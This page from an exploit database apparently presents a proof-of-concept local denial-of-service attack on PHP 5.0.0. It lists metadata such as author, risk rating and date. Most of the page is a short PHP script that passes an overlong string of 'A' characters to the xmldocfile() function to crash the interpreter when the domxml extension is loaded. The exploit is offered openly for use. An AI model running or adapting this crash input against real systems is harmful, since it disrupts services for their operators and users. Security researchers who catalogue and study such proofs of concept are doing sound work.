[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHP 5.0.0 - 'xmldocfile()' Local Denial of Service

Author
Yakir Wizman
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-26125
Category
dos / poc
Date add
28-08-2016
Platform
php
<?php
#############################################################################
## PHP 5.0.0 xmldocfile() Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
if (!extension_loaded("domxml")) die("You need domxml extension loaded!");
 
$str = str_repeat('A', 9999);
xmldocfile($str);
?>

#  0day.today [2024-06-30]  #